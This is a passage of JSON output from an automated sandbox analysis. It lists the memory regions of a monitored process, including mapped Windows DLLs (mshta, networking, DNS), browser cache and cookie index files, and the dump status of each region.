"00:01:03.176", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 9768959, "entry_point": 0, "filename": null, "id": "region_782", "name": "pagefile_0x00000000007d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8192000, "timestamp": "00:01:03.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_783", "name": "pagefile_0x0000000000960000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9830400, "timestamp": "00:01:03.179", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_804", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:03.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1843199, "entry_point": 0, "filename": null, "id": "region_805", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:03.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 1900544, "filename": "\\Windows\\System32\\en-US\\mshta.exe.mui", "id": "region_806", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 1900544, "timestamp": "00:01:03.200", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000822-addr_0x00000000001e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_822", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:01:03.304", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000823-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_823", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:03.304", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_835", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:03.368", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_836", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:01:03.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 32899071, "entry_point": 0, "filename": null, "id": "region_843", "name": "private_0x0000000001e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 31850496, "timestamp": "00:01:03.440", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000844-addr_0x000007fffffdc000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_844", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:03.440", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000845-addr_0x0000000000210000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_845", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:03.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2871295, "entry_point": 2412232, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_850", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 2359296, "timestamp": "00:01:03.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_852", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:03.483", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000853-addr_0x0000000001f60000-size_0x0000000000160000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1441792, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 34340863, "entry_point": 0, "filename": null, "id": "region_853", "name": "private_0x0000000001f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 32899072, "timestamp": "00:01:03.484", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 31715327, "entry_point": 0, "filename": null, "id": "region_856", "name": "pagefile_0x0000000001d60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30801920, "timestamp": "00:01:03.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791715741696, "type": "region", "version": 1 }, "end_va": 8791715839999, "entry_point": 8791715746096, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_857", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791715741696, "timestamp": "00:01:03.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 37285887, "entry_point": 34340864, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_858", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34340864, "timestamp": "00:01:03.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_859", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:03.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_860", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:03.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 40710143, "entry_point": 0, "filename": null, "id": "region_861", "name": "pagefile_0x0000000002390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37289984, "timestamp": "00:01:03.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791754080256, "type": "region", "version": 1 }, "end_va": 8791754231807, "entry_point": 8791754118744, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_862", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791754080256, "timestamp": "00:01:03.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_873", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:03.543", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_874", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:03.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_875", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:03.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2408447, "entry_point": 2359296, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_876", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 2359296, "timestamp": "00:01:03.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2457599, "entry_point": 2424832, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_877", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 2424832, "timestamp": "00:01:03.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 2490368, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_878", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 2490368, "timestamp": "00:01:03.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 2555904, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_879", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:01:03.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_883", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:01:03.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_884", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:03.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 0, "filename": null, "id": "region_885", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:03.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6098943, "entry_point": 6094848, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_891", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 6094848, "timestamp": "00:01:03.587", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6168575, "entry_point": 0, "filename": null, "id": "region_892", "name": "pagefile_0x00000000005e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6160384, "timestamp": "00:01:03.588", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_893", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:03.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6234111, "entry_point": 0, "filename": null, "id": "region_895", "name": "pagefile_0x00000000005f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6225920, "timestamp": "00:01:03.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6098943, "entry_point": 0, "filename": null, "id": "region_897", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:01:03.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 6299647, "entry_point": 0, "filename": null, "id": "region_912", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:01:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 315392, "start_va": 8791770726400, "type": "region", "version": 1 }, "end_va": 8791771041791, "entry_point": 8791770730608, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_913", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791770726400, "timestamp": "00:01:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791791501312, "type": "region", "version": 1 }, "end_va": 8791791534079, "entry_point": 8791791506692, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_914", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 8791791501312, "timestamp": "00:01:03.737", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000915-addr_0x0000000001f60000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_915", "name": "private_0x0000000001f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 32899072, "timestamp": "00:01:03.739", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000916-addr_0x0000000002040000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 34340863, "entry_point": 0, "filename": null, "id": "region_916", "name": "private_0x0000000002040000", "norm_filename": null, "region_type": "private_memory", "start_va": 33816576, "timestamp": "00:01:03.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 8791746019328, "type": "region", "version": 1 }, "end_va": 8791746392063, "entry_point": 8791746046272, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_917", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 8791746019328, "timestamp": "00:01:03.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000918-addr_0x00000000026e0000-size_0x0000000000190000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1638400, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 42401791, "entry_point": 0, "filename": null, "id": "region_918", "name": "private_0x00000000026e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40763392, "timestamp": "00:01:03.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728877567, "entry_point": 8791728756924, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_919", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:01:03.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791728652288, "type": "region", "version": 1 }, "end_va": 8791728697343, "entry_point": 8791728656792, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_920", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 8791728652288, "timestamp": "00:01:03.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 44761087, "entry_point": 0, "filename": null, "id": "region_934", "name": "private_0x00000000029b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43712512, "timestamp": "00:01:03.787", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000935-addr_0x000007fffffda000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_935", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:03.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 401408, "start_va": 8791581523968, "type": "region", "version": 1 }, "end_va": 8791581925375, "entry_point": 8791581528472, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_936", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791581523968, "timestamp": "00:01:03.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 8791581392896, "type": "region", "version": 1 }, "end_va": 8791581507583, "entry_point": 8791581397408, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_937", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 8791581392896, "timestamp": "00:01:03.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791711809536, "type": "region", "version": 1 }, "end_va": 8791711879167, "entry_point": 8791711814848, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_938", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 8791711809536, "timestamp": "00:01:03.791", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000939-addr_0x0000000000610000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_939", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:03.795", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_940", "name": "pagefile_0x0000000000610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6356992, "timestamp": "00:01:03.796", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791636770816, "type": "region", "version": 1 }, "end_va": 8791636807679, "entry_point": 8791636776116, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_941", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 8791636770816, "timestamp": "00:01:03.799", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791730356224, "type": "region", "version": 1 }, "end_va": 8791730442239, "entry_point": 8791730381016, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_942", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 8791730356224, "timestamp": "00:01:03.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000943-addr_0x0000000002000000-size_0x0000000000030000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 196608, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_943", "name": "private_0x0000000002000000", "norm_filename": null, "region_type": "private_memory", "start_va": 33554432, "timestamp": "00:01:03.805", "type": "region", "version": 1 }, { "dump": { "filename": 